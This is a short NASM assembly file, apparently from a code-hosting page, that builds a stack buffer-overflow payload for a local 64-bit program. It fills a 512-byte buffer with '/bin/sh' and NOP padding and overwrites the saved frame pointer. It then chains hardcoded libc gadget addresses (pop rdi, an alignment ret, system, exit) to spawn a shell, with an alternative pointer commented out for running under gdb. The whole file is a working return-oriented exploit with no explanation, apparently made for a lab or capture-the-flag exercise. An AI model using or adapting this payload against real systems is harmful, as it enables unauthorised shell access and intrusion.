24 lines
774 B
NASM
24 lines
774 B
NASM
bits 64
|
|
|
|
global _start
|
|
_start:
|
|
; we place /bin/sh and a few zero bytes at the start (16B)
|
|
db '/bin/sh', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
|
|
|
|
times 0x1f0 nop ; fill buffer, i.e., 512B in total
|
|
|
|
times 0x10 nop ; buffer is at rbp+0x210, so skip 0x10 more
|
|
times 0x8 nop ; overwrite saved rbp
|
|
|
|
dq 0x7ffff7e007e5 ; pop rdi + ret
|
|
; real version
|
|
dq 0x7fffffffe2a0 ; ptr to buffer, which contains "/bin/sh" at the start
|
|
; gdb version
|
|
; dq 0x7fffffffe250 ; ptr to buffer, which contains "/bin/sh" at the start
|
|
|
|
dq 0x7ffff7e007e6 ; just ret -- this will change the stack by 8B
|
|
dq 0x7ffff7e25490 ; system("/bin/sh")
|
|
dq 0x7ffff7e007e5 ; pop rdi
|
|
dq 0
|
|
dq 0x7ffff7e17680 ; exit(0)
|